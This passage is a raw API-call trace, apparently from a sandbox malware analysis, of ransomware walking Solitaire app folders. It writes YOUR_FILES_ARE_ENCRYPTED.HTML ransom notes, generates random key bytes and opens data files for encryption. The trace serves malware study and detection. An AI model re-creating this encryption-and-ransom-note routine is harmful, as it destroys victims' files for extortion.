dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.501] GetProcessHeap () returned 0x600000 [0116.501] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.502] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6803cef0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6803cef0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0116.502] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.502] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalState") returned 112 [0116.502] GetProcessHeap () returned 0x600000 [0116.502] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.502] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalState" [0116.502] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalState\\*" [0116.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6803cef0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6803cef0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.503] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6803cef0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6803cef0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0116.503] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6803cef0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6803cef0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0116.503] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.503] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0116.503] GetProcessHeap () returned 0x600000 [0116.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.504] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.504] CloseHandle (hObject=0x32c) returned 1 [0116.505] GetProcessHeap () returned 0x600000 [0116.505] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.505] GetProcessHeap () returned 0x600000 [0116.505] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.505] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x688e16a3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x688e16a3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x688e16a3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0116.505] StrStrIW (lpFirst="Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.505] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe") returned 170 [0116.505] GetProcessHeap () returned 0x600000 [0116.505] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.505] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe" [0116.505] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\*" [0116.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x688e16a3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x688e16a3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x688e16a3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.505] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x688e16a3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x688e16a3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x688e16a3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0116.505] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x688e16a3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x688e16a3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68a38fd5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0116.505] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.505] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 186 [0116.505] GetProcessHeap () returned 0x600000 [0116.505] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.506] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore" [0116.506] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0116.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x688e16a3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x688e16a3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68a38fd5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626978 [0116.508] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x688e16a3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x688e16a3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68a38fd5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0116.509] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x688e16a3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68f23fcc, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68f23fcc, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0116.509] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.509] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 206 [0116.509] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0116.509] lstrlenW (lpString=".dat") returned 4 [0116.509] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0116.509] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0116.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\microsoft.microsoftsolitairecollection_3.3.9211.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0116.509] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=32768) returned 1 [0116.509] GetProcessHeap () returned 0x600000 [0116.509] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0116.512] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="23") returned 2 [0116.512] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="C7") returned 2 [0116.512] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="FF") returned 2 [0116.512] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="00") returned 2 [0116.512] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="9A") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="52") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="3D") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="88") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="70") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="AC") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="27") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="4A") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="9B") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="57") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="D5") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="E0") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="7B") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="E4") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="AD") returned 2 [0116.512] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="5A") returned 2 [0116.512] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="BD") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="8D") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="CC") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="77") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="5B") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="EE") returned 2 [0116.512] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="62") returned 2 [0116.512] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="F3") returned 2 [0116.512] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="D6") returned 2 [0116.512] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="BA") returned 2 [0116.512] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="8E") returned 2 [0116.512] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="54") returned 2 [0116.513] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0116.513] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.513] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0116.513] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x689a03cb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x689a03cb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x689a03cb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0116.513] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.513] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 211 [0116.513] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0116.513] lstrlenW (lpString=".LOG1") returned 5 [0116.513] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0116.513] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x689a03cb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x689a03cb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x689a03cb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0116.513] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.513] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 211 [0116.513] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0116.513] lstrlenW (lpString=".LOG2") returned 5 [0116.513] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0116.513] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x689a03cb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x689a03cb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x689a03cb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0116.513] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0116.513] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 216 [0116.513] GetProcessHeap () returned 0x600000 [0116.513] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.514] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\microsoft.microsoftsolitairecollection_3.3.9211.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.514] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.515] CloseHandle (hObject=0x320) returned 1 [0116.515] GetProcessHeap () returned 0x600000 [0116.515] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.515] GetProcessHeap () returned 0x600000 [0116.515] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.515] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x688e16a3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x688e16a3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68a38fd5, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0116.515] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.515] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\Microsoft.MicrosoftSolitaireCollection_3.3.9211.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 200 [0116.515] GetProcessHeap () returned 0x600000 [0116.515] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.515] CreateFileW 